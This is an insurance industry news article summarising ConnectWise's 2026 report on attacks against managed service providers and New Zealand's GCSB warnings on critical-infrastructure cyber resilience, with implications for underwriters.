Cyber attackers’ growing focus on trusted access paths through managed service providers (MSPs) and critical infrastructure is increasing the potential for correlated cyber, business interruption, and liability losses across multiple insureds.
ConnectWise’s “2026 Managed Service Provider Threat Report,” based on activity observed in 2025, concludes that attackers are relying less on novel software vulnerabilities and more on abusing identity, remote access, and software supply chains within MSP-managed environments. The report identifies four key routes into MSP estates:
Once inside an MSP, threat actors can use repeatable administrative practices and shared configurations to move across multiple customer environments. ConnectWise notes that artificial intelligence is being applied to speed up existing tactics rather than to introduce entirely new ones. Investigators are observing AI’s influence in more convincing phishing, more realistic fraud attempts, faster malware development cycles, and more efficient operations, even when AI tooling is not directly visible in telemetry. These patterns suggest that a single technology or service provider compromise could affect multiple policyholders at once.
Ransomware remained a central operational risk for MSPs and their customers in 2025, with ConnectWise reporting heightened activity toward the end of the year. The analysis describes a “scan, steal, encrypt” pattern, in which attackers identify exposed assets, exfiltrate data, and then encrypt systems, often after first targeting backup infrastructure. By disrupting or corrupting backups early in an intrusion, ransomware operators can reduce recovery options and increase leverage during negotiations.
The report also notes attempts to circumvent one-time-password-based multi-factor authentication, including by exploiting VPN configuration artefacts and retained secrets on network appliances to regain access. Public-facing SSL VPN interfaces feature as a recurring initial access point. In several incidents, attackers moved from successful VPN authentication to full domain compromise within hours, reducing the time available for defenders to detect and contain activity. This compressed response window may drive higher incident costs, longer outages, and more severe claims.
ConnectWise also highlights a rise in software supply chain compromise, including campaigns that target maintainers of open source packages. In the “Shai-Hulud” example, compromised npm maintainer accounts were used to push trojanised updates to downstream environments. Similar techniques have been observed against other repositories, including PyPI, NuGet, RubyGems, and Rust. Because MSPs and their customers often use automated and standardised deployment patterns across many tenants, a single tainted update can propagate widely, creating correlated exposure for insurers with multiple insureds using the same technology stacks or vendors.
The report further describes “ClickFix” and related social engineering tactics, where users are persuaded to copy and paste attacker-provided commands into legitimate system utilities. This shifts execution to the user and can bypass technical controls that focus on detecting automated malware delivery. Patrick Beggs, chief information security officer at ConnectWise, said attackers are reframing how they leverage trust in digital environments. “The defining theme of 2025 was the abuse of trust,” Beggs said, as reported by Security Brief New Zealand. He added that attackers are “exploiting valid credentials, misconfigured VPNs, trusted updates, and even user behaviour to gain access to systems and data,” and that for MSPs, “identity security, privileged access governance, and early behavioural detection must be foundational.”
Alongside these MSP-focused trends, New Zealand’s Government Communications Security Bureau (GCSB) has warned that cyber resilience across parts of the country’s critical infrastructure is only just meeting basic expectations. “Unfortunately, there are... pockets, including in our critical infrastructure, where that cybersecurity is barely meeting that foundational level that we would expect,” GCSB director-general Andrew Clark told MPs at a select committee, as reported by RNZ.
Clark said a tool counting cyber threats to New Zealand had recently “clicked over one billion,” and pointed to supply chains – including digital connections from private vendors into public agencies – as a growing point of weakness. The government has released a new cybersecurity strategy and action plan, replacing a 2019 strategy that preceded the rise of generative AI tools such as ChatGPT. The new framework prioritises the protection of “critical infrastructure,” with an initial consultation asking which sectors and services should fall under that definition and what level of cyber defence they should meet. Examples under consideration range from power and telecommunications to health services and financial systems.
Law firm Russell McVeagh has assessed that the strategy will likely have “significant governance implications for organisations,” noting that it sets clearer expectations for boards and management on cyber risk management and the protection of personal information. The firm also points to the prospect of regulation designed to “better incentivise the protection of personal information.” Clark told MPs that many smaller firms may not be classified as critical infrastructure but still hold sensitive data needing protection. He described “a missing piece” as the right incentive structure for such organisations to invest in appropriate security.
Both the ConnectWise findings and the government’s reform agenda indicate a closer connection between cyber controls, supply chain governance, and insurability. Key considerations for underwriters and brokers include:
Read next: Q3 report shows cyber losses double despite steady incidents
The developments point to a need for closer alignment between cyber risk assessment, vendor oversight, and policy design. As attackers continue to exploit trusted access, software dependencies, and gaps in basic controls, and as policymakers move toward more prescriptive expectations for critical and data‑rich sectors, carriers and intermediaries will need to test how well their underwriting, aggregation monitoring, and incident response arrangements reflect the realities of MSP‑driven and infrastructure-level exposure.
